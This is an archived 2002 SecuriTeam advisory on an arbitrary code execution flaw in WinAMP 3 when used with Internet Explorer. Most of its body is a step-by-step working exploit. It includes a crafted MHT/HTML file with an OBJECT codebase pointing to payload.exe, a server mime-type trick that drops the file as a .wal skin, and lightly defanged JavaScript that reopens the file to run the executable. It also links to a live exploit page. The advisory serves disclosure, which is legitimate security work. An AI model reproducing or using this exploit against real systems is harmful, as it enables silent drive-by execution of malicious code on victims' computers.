[NT] WinAMP 3 Allows Execution of Arbitrary Code

From: support@securiteam.com
Date: 08/19/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 19 Aug 2002 10:56:04 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  WinAMP 3 Allows Execution of Arbitrary Code
------------------------------------------------------------------------

SUMMARY

The new WinAMP 3 fails to address a serious arbitrary code execution
vulnerability when the program is combined with Internet Explorer. The
vulnerability allows a remote attacker to cause the program to execute
arbitrary code automatically without the need for user intervention.

DETAILS

Vulnerable systems:
 * WinAMP 3
 * WinAMP 2 (Though this vulnerability advisory was written for WinAMP 3,
WinAMP 2 has a similar problem)

WinAMP 3 uses a new skinning system that uses the .wal extension, this
skin type is opened automatically in MSIE (it does not prompt for
download). The skin is stored in a known location on the user's hard disk
namely:

C:\Program Files\Winamp3\Skins

(This is the default location given by the program)

Exploit:
A working exploit code is available at
<http://kuperus.xs4all.nl/WinAMP3.htm>
http://kuperus.xs4all.nl/WinAMP3.htm (NOTE, this is a working exploit
code, going to the link will cause WinAMP to run arbitrary code).

Note that this version exploit code does not use any MSIE hole to invoke
the executable and it will continue to work even after Microsoft patches
its browser.

Recreation steps:
1) Create a directory c:\exploit
2) Place an EXE file in it, let us call it payload.exe, then create a file
called exploit.htm and give it the following contents:

 <html>
 <body>
 <img src="payload.exe">
 </body>
 </html>

3) Open the file in Internet Explorer, choose file > save as, and save it
as > exploit.mht
4) Open it in notepad and add the following line to the top

  <html style="display:none;">

It should look like this :

 <html style="display:none;">
 From: <Saved by Microsoft Internet Explorer 5>
 Subject:
 Date: Mon, 5 Aug 2002 18:30:03 +0200
 MIME-Version: 1.0

Then look for the body section of this HTML document (it looks a little
mangled) delete everything between the body tags and place an object tag
in its place, so it looks like this:

 <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
 <BODY>
 <0BJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:file:///C:/Program%20Files/WinAMP3/Skins/amp.wal!file:///c:/exploit/payload.exe"></0BJECT>
 </BODY></HTML>

(To prevent execution, the O was replaced with a 0)

This code will later be used to invoke our executable. What we have done
is we have slightly altered the MHT file so that it can be viewed both as
HTML and as MHT file. Files starting with an <html> tag are always seen as
HTML files in Internet Explorer.

5) Now we want to place this on the user's hard disk. We know WAL files
are opened automatically by WinAMP 3 and placed in a known location so we
will rename our exploit.mht file to WAL. Unfortunately Internet Explorer
disrespects mime types so by having added a <html> tag to the MHT file it
tries top open it as an <html> file the only way Jelmer found around this
is to set the mime type to a value MSIE does not know. Jelmer chose
x-foo/x-bar. If you are using Apache, you can add the following to your
mime.types file

  x-foo/x-bar wal

This means that the web server will pass this mime type along with every
file requested ending in .wal. When we now request this file, it will be
opened by WinAMP 3 and an error message will follow shortly. However, at
that time it is all ready too late, our exploit.wal file has been placed
in

  C:\Program Files\WinAMP3\Skins\exploit.wal

Now all that remains is bringing it together by making the following
sequence of events occur

1. Download our exploit.wal
2. Wait a few seconds for it to finish downloading then call exploit.wal
as HTML file (the file also doubles as MHT file and the object tag
included in the HTML portion points to itself as the codebase)

Here is the code for this:

 <html>
 <body>

 Waiting for 5 seconds..

 <!-- download our renamed mht file and place it on the users disk -->
 <!frame src="amp.wal" style="display:none"></iframe>

 <scr!pt language="javascript">

 //wait for 5 seconds

 setTimeout("ExecuteFile()",5000);

 function ExecuteFile() {
  // open the saved wal file as html file
  // oddly when called from disk it didn't open it as html file so we need
to force this behaviour by using a modeless dialog

  sHTML = 'file:///C:/Program%20Files/WinAMP3/Skins/amp.wal';
     sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px;
 dialogheight: 0px; status:no; unadorned:yes; help:no';
     vReturnValue = window.showModelessDialog(sHTML, '', sFeatures)
 }
 </script>

 </body>
 </html>

(To prevent execution, the I was replaced with a !)

3. That should be it.

ADDITIONAL INFORMATION

The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
Jelmer.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages